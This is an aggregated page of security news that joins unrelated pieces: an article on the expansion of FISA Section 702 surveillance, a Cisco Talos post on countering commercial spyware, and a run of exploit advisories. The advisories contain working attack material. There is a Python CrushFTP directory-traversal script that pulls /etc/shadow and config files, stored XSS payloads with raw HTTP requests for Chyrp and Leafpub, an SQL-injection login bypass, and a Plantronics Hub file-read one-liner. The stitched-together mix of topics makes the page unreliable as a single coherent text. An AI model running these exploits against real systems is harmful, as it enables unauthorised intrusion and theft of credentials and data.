A coalition of digital rights groups is demanding the US declassify records that would clarify just how expansive a major surveillance program really is.

Last month, US president Joe Biden signed a surveillance bill enhancing the National Security Agency’s power to compel US businesses to wiretap communications going in and out of the country. The changes to the law have left legal experts largely in the dark as to the true limits of this new authority, chiefly when it comes to the types of companies that could be affected. The American Civil Liberties Union and organizations like it say the bill has rendered the statutory language governing the limits of a powerful wiretap tool overly vague, potentially subjecting large swaths of corporate America to warrantless and secretive surveillance practices.

In April, Congress rushed to extend the US intelligence system’s “crown jewel,” Section 702 of the Foreign Intelligence Surveillance Act (FISA). The spy program allows the NSA to wiretap calls and messages between Americans and foreigners abroad—so long as the foreigner is the individual being “targeted” and the intercept serves a significant “foreign intelligence” purpose. Since 2008, the program has been limited to a subset of businesses that the law calls “electronic communications service providers,” or ECSPs—corporations such as Microsoft and Google, which provide email services, and phone companies like Sprint and AT&T.

In recent years, the government has worked quietly to redefine what it means to be an ECSP in an attempt to extend the NSA’s reach, first unilaterally and now with Congress’ backing. The issue remains that the bill Biden signed last month contains murky language that attempts to redefine the scope of a critical surveillance program. In response, a coalition of digital rights organizations, including the Brennan Center for Justice to the Electronic Frontier Foundation, is pressing the US attorney general, Merrick Garland, and the nation’s top spy, Avril Haines, to declassify details about a relevant court case that could, they say, shed much-needed light on the situation.

In a letter to the top officials, more than 20 such organizations say they believe the new definition of an ECSP adopted by Congress might “permit the NSA to compel almost any US business to assist” the agency, noting that all companies today provide some sort of “service” and have access to equipment on which “communications” are stored.

“Deliberately writing overbroad surveillance authorities and trusting that future administrations will decide not to exploit them is a recipe for abuse,” the letter says. “And it is entirely unnecessary, as the administration can—and should—declassify the fact that the provision is intended to reach data centers.”

The Justice Department confirmed receipt of the letter on Tuesday but referred WIRED to the Office of the Director of National Intelligence, which has primary purview over declassification decisions. The ODNI has not responded to a request for comment.

It is widely believed—and has been reported—that data centers are the intended target of this textual change. Matt Olsen, the assistant US attorney general for national security, appeared on an April 17 episode of the _Lawfare_ podcast to say that, while unable to confirm or deny any specifics, data centers today store a significant amount of communications data and are an “example” of why the government viewed the change as necessary.

A DOJ spokesperson pointed WIRED to an April 18 letter by Garland that claims the new ECSP definition is “narrowly tailored.” The letter includes written reflections on the provision by the assistant attorney general, Carlos Uriarte, who writes that the “fix” is meant to address a “critical intelligence gap” resulting from changes in technology over the past 15 years. According to Uriarte, the DOJ has committed to applying the new definition internally “to cover the type of service provider at issue” before the court.

Ostensibly this means the government is promising to limit future surveillance directives to data centers (in addition to the companies traditionally defined as ECSPs).

The surveillance court that oversees FISA and the appeals court that reviews its decisions sided two years ago with an unidentified company that fought back after being served an NSA order. Both courts ruled that it did not, in fact, appear to meet the criteria for being considered an ECSP, as only part of its function was storing communications data. Finding the government’s interpretation of the statute overly broad, the court reminded the government that only Congress has the “competence and constitutional authority” to rewrite the law.

Digital rights groups argue that declassifying additional information about this FISA case may help the public understand which types of businesses are actually subject to NSA directives. Practically speaking, they say, that information is no longer a secret anyway. “Declassifying this information would cause little if any national security harm,” the letter says. “The New York Times has already revealed that the relevant FISC case addressed data centers for cloud computing.”

In the aftermath of the FISA court’s ruling, the NSA and other spy agencies began lobbying the House and Senate intelligence committees to aid the administration in redefining what it means to be an ECSP. Members of both committees have subsequently portrayed the court’s ruling as a “directive” that Congress needs to expand the NSA’s reach. In a floor speech last month, Mark Warner, the chair of the Senate Intelligence Committee, said, “So what happened was, the FISA Court said to Congress: You guys need to close this loophole; you need to close this and change this definition.”

But in fact what the court asserted was that the government had exceeded its authority and that it was Congress’ job, not the Justice Department’s, to revise the law. “Any unintended gap in coverage revealed by our interpretation is, of course, open to reconsideration by the branches of government whose competence and constitutional authority extend to statutory revision,” the court said.

This would culminate in new language being proposed that quickly alarmed legal experts, including top civil liberties attorneys who’ve appeared before the secret court in the past. The surveillance fears quickly spread to Silicon Valley. The Information Technology Industry Council, one of the tech industry's top lobbying arms, warned that companies like Facebook and IBM were interpreting the bill as having “vastly expanded the US government’s warrantless surveillance capabilities.”

This expansion, the firm added, would also hinder the “competitiveness of US technology companies” and arguably imperil the “continued global free flow of data between the US and its allies.” Customers internationally, it argued, would likely begin taking their business elsewhere should the US government turn data centers into surveillance watering holes.

Concerns about the new ECSP definition have been circulating since December. While largely dismissing them, members of the House and Senate intelligence committees made a few adjustments in February, exempting a handful of business types. This came in response to popular concerns that Starbucks employees and hotel IT staff might be secretly conscripted by the NSA. FISA experts such as Marc Zwillinger—a private attorney who has appeared twice before the FISA Court of Review—noted in response to those adjustments that Congress’ rush to exempt a handful of businesses only served to demonstrate that the text was inherently too broad.

Intelligence committee members kept the pressure on lawmakers to reauthorize the Section 702 program with the sought-after language, going as far as to suggest that another 9/11-style attack might occur if they failed. The power of the committees was on full display, as while neither actually have primary jurisdiction over FISA, a majority of the Section 702 bill that passed was authored by intelligence committee staff.

Even while supporting the new framework and dismissing the intensity of civil society’s concerns, Warner did eventually step forward to acknowledge the new ECSF definition needed additional tweaking. First, on the Senate floor in April, he said that Garland shared his “view” that the language “could have been drafted better.” Later, in response to questions from reporters, he added: “I’m absolutely committed to getting that fixed.”

That appears unlikely to happen soon. According to The Record, Warner indicated that the best time to update the language again would be in the “next intelligence bill,” presumably referring to legislation this fall broadly reauthorizing the intelligence community’s work.

In the meantime, however, more than half of Congress is running for election, and the next US president will have greater surveillance powers than any other before. No one can say for sure who that president will be or how they’ll make use of that authority.

_Updated 2:20 pm ET, May 14, 2024, to clarify statements by Matt Olsen, assistant US attorney general for national security, to the_ Lawfare _podcast._

Secrecy Concerns Mount Over Spy Powers Targeting US Data Centers

CrushFTP versions prior to 11.1.0 suffers from a directory traversal vulnerability.

    ## Exploit Title: CrushFTP Directory Traversal## Google Dork: N/A# Date: 2024-04-30# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)## Vendor Homepage: https://www.crushftp.com/## Software Link: https://www.crushftp.com/download/## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)## Tested on: Windows10import requestsimport re# Regular expression to validate the URLdef is_valid_url(url):    regex = re.compile(        r'^(?:http|ftp)s?://' # http:// or https://        r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...        r'localhost|' # localhost...        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4        r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6        r'(?::\d+)?' # optional: port        r'(?:/?|[/?]\S+)$', re.IGNORECASE)    return re.match(regex, url) is not None# Function to scan for the vulnerabilitydef scan_for_vulnerability(url, target_files):    print("Scanning for vulnerability in the following files:")    for target_file in target_files:        print(target_file)    for target_file in target_files:        try:            response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)            if response.status_code == 200 and target_file.split('/')[-1] in response.text:                print("vulnerability detected in file", target_file)                print("Content of file", target_file, ":")                print(response.text)            else:                print("vulnerability not detected or unexpected response for file", target_file)        except requests.exceptions.RequestException as e:            print("Error connecting to the server:", e)# User inputinput_url = input("Enter the URL of the CrushFTP server: ")# Validate the URLif is_valid_url(input_url):    # Expanded list of allowed files    target_files = [        "/var/www/html/index.php",        "/var/www/html/wp-config.php",        "/etc/passwd",        "/etc/shadow",        "/etc/hosts",        "/etc/ssh/sshd_config",        "/etc/mysql/my.cnf",        # Add more files as needed            ]    # Start the scan    scan_for_vulnerability(input_url, target_files)else:    print("Invalid URL entered. Please enter a valid URL.")

CrushFTP Directory Traversal

TrojanSpy.Win64.EMOTET.A malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy.Win64.EMOTET.A Vulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x64-bit "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: EMOTETType: PE64MD5: f917c77f60c3c1ac6dbbadbf366ddd30SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486cVuln ID: MVID-2024-0684Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x64 DLL CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy.Win64.EMOTET.A MVID-2024-0684 Code Execution

Plantronics Hub version 3.25.1 suffers from an arbitrary file read vulnerability.

    # Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read# Date: 2024-05-10# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh fromMastercard# Vendor Homepage:https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895# Version: Plantronics Hub for Windows version 3.25.1# Tested on: Windows 10/11# CVE : CVE-2024-27460As a regular user drop a file called "MajorUpgrade.config" inside the"C:\ProgramData\Plantronics\Spokes3G" directory. The content ofMajorUpgrade.config should look like the following one liner:^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.configExchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy(any file on the system). The desired file will be copied into C:\ProgramFiles (x86)\Plantronics\Spokes3G\UpdateServiceTempSteps to reproduce (POC):- Open cmd.exe- Navigate using cd C:\ProgramData\Plantronics\Spokes3G- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config- Desired file will be copied into C:\Program Files(x86)\Plantronics\Spokes3G\UpdateServiceTemp

Plantronics Hub 3.25.1 Arbitrary File Read

Backdoor.Win32.AsyncRat malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AsyncRatVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: AsyncRatType: PE32MD5: 2337b9a12ecf50b94fc95e6ac34b3eccSHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9Vuln ID: MVID-2024-0683Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

Chryp version 2.5.2 suffers from a persistent cross site scripting vulnerability.

    # Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/chyrp/# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip# Version: 2.5.2# Tested on: MacOS### Steps to Reproduce ###- Login from the address: http://localhost/chyrp/?action=login.- Click on 'Write'.- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>- Fill in the 'Body' area and click 'Publish'.- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /chyrp/admin/?action=add_post HTTP/1.1Host: localhostCookie: ChyrpSession=c4194c16a28dec03e449171087981d11;show_more_options=trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------28307567523233313132815561598Content-Length: 1194Origin: http://localhostReferer: http://localhost/chyrp/admin/?action=write_postUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="title""><img src=x onerror=alert("Stored")>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="body"<p>1337</p>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="status"public-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="slug"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="created_at"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="original_time"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="trackbacks"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="feather"text-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="hash"11e11aba15114f918ec1c2e6b8f8ddcf-----------------------------28307567523233313132815561598--

Chyrp 2.5.2 Cross Site Scripting

Leafpub version 1.1.9 suffers from a persistent cross site scripting vulnerability.

    # Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/Leafpub# Software Link: https://github.com/Leafpub/leafpub# Version: 1.1.9# Tested on: MacOS### Steps to Reproduce ###- Please login from this address: http://localhost/leafpub/admin/login- Click on the Settings > Advanced- Enter the following payload into the "Custom Code" area and save it: ("><imgsrc=x onerror=alert("Stored")>)- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /leafpub/api/settings HTTP/1.1Host: localhostCookie:authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwloUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 476Origin: http://localhostReferer: http://localhost/leafpub/admin/settingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetitle=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

Leafpub 1.1.9 Cross Site Scripting

Prison Management System Using PHP suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass# Date: 15/03/2024# Exploit Author: Sanjay Singh# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html# Tested on: Windows ,XAMPP# CVE : CVE-2024-33288# Proof of Concept:Step 1-Visit http://localhost/prison/Step 2 - Click on Admin Dashboard button and redirect on login page.Step 3– Enter username as admin' or '1'='1 and password as 123456Step 4 – Click sing In and now you will be logged in as admin.

Prison Management System Using PHP SQL Injection

Commercial spyware tools can threaten democratic values by enabling governments to conduct covert surveillance on citizens, undermining privacy rights and freedom of expression.

Tuesday, May 14, 2024 08:42

Cisco Talos is delighted to share updates about our ongoing partnership with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to combat cybersecurity threats facing civil society organizations.

Talos has partnered with CISA on several initiatives through the Joint Cyber Defense Collaborative (JCDC), including sharing intelligence on strategic threats of interest.

Adversaries are leveraging advancements in technology and the interconnectedness of the world’s networks to undermine democratic values and interests by targeting high-risk communities within civil society. According to CISA, these communities include activists, journalists, academics and organizations engaged in advocacy and humanitarian causes. Consequently, the U.S. government has elevated efforts in recent years to counter cyber threats that have placed the democratic freedoms of organizations and individuals at heightened risk.

The JCDC’s High-Risk Community Protection (HRCP) initiative is one such measure that brings together government, technology companies, and civil society organizations to strengthen the security of entities at heightened risk of cyber threat targeting and transnational repression.

The HRCP initiative’s outputs — including a threat mitigation guide for civil society, operational best practices, and online resources for communities at risk — aim to counter the threats posed by state-sponsored advanced persistent threats (APTs) and, increasingly, private-sector offensive actors (PSOA).

Our ongoing partnership with CISA and contributions to the JCDC’s HRCP initiative are consistent with Cisco’s security mission to protect data, systems, and networks, and uphold and respect the human rights of all.

**Spyware threats persist despite government and private sector measures**

As we’ve written about, the use of commercially available spyware to target high-profile or at-risk individuals and organizations is a global problem. This software can often track targets’ exact location, steal their messages and personal information, or even listen in on phone calls. Private companies, commonly referred to as “PSOAs” or “cyber mercenaries,” have monetized the development of these offensive tools, selling their spyware to any government willing to pay regardless of the buyer's intended use.

Commercial spyware tools can threaten democratic values by enabling governments to conduct covert surveillance on citizens, undermining privacy rights and freedom of expression. Lacking any international laws or norms around the use of commercial spyware, this surveillance can lead to the suppression of dissent, erosion of trust in democratic institutions, and consolidation of power in the hands of authoritarian governments.

The U.S. and its partners have taken steps to curb the proliferation of these dangerous tools. These include executive orders banning the use of certain spyware by U.S. government agencies, export restrictions and sanctions on companies or individuals involved in the development and sale of spyware (such as the recent sanctioning of members of the Intellexa Commercial Spyware Consortium), and diplomatic efforts with international partners and allies to pressure countries that harbor or support such firms.

Private industry has also played a substantial role in countering this threat, including by publishing research and publicly attributing PSOAs and countries involved in digital repression. Some companies have also developed countersurveillance technologies (such as Apple’s Lockdown Mode) to protect high-risk users and have initiated legal challenges through lawsuits against PSOAs alleging privacy violations. In March 2023, Cisco proudly became principal co-author of the Cybersecurity Tech Accord principles limiting offensive operations in cyberspace, joining several technology partners in calling for industry-wide principles to counter PSOAs.

**Talos intelligence fuels HRCP threat mitigation guide for civil society**

Talos has tracked the evolution of the commercial spyware industry and APT targeting of high-risk industries, placing us in a strong position to contribute our knowledge to the HRCP effort. Our research on two key threat actors — the Intellexa Commercial Spyware Consortium and the China state-sponsored Mustang Panda group — informed the HRCP guide’s overview of tactics commonly used against high-risk communities.

Talos has closely monitored threats stemming from the Intellexa Consortium, an umbrella group of organizations and individuals that offer commercial spyware tools to global customers, including authoritarian governments. In May 2023, we conducted a technical analysis of Intellaxa’s flagship PREDATOR spyware which was initially developed by a PSOA known as Cytrox. Our research specifically looked at two components of Intellexa's mobile spyware suite known as “ALIEN” and “PREDATOR,” which compose the backbone of the organization’s implant.

Our findings included an in-depth walkthrough of the infection chain, including the implant’s various information-stealing capabilities and evasion techniques. Over time, we learned more about Intellexa’s inner workings, including their spyware development timelines, product offerings, operating paradigms and procedures.

Our research on Mustang Panda also contributed to the mitigation guide by illustrating how government-sponsored threat actors have targeted civil society organizations with their own signature tools and techniques. This APT is heavily focused on political espionage and has targeted non-governmental organizations (NGOs), religious institutions, think tanks, and activist groups worldwide. Mustang Panda commonly sends spear phishing emails using enticing lures to gain access to victim networks and install custom implants, such as PlugX, that enable device control and user monitoring. The group has continuously evolved its delivery mechanisms and payloads to ensure long-term uninterrupted access, underscoring the threat posed to civil society and others.

**What is next for this growing threat?**

Threat actors with ties to Russia, China, and Iran have primarily been responsible for this heightened threat activity, according to industry reporting. But the threat is not limited to them. Last year, a U.K. National Cyber Security Centre (NCSC) estimate found that at least 80 countries have purchased commercial spyware, highlighting how the proliferation of these tools enables even more actors to join the playing field.

Yet we are staying ahead of the game. Talos researchers are continuously identifying the latest trends in threat actor targeting which include not only the use of commercial spyware but other tools and techniques identified in the HRCP guide, such as spear phishing and trojanized applications. Our intelligence powers Cisco’s security portfolio, ensuring customer safety.

Talos created a reporting resource where individuals or organizations suspected of being infected with commercial spyware can contact Talos’ research team (no-spyware@external.cisco.com) to assist in furthering the community’s knowledge of these threats.

We are determined to continue our work with CISA, other agencies, and industry leaders, leveraging the power of partnerships to protect Cisco customers and strengthen community resilience against common adversaries.

Talos joins CISA to counter cyber threats against non-profits, activists and other at-risk communities

Deploying advanced authentication measures is key to helping organizations address their weakest cybersecurity link: their human users. Having some form of 2-factor authentication in place is a great start, but many organizations may not yet be in that spot or have the needed level of authentication sophistication to adequately safeguard organizational data. When deploying

Tag

#auth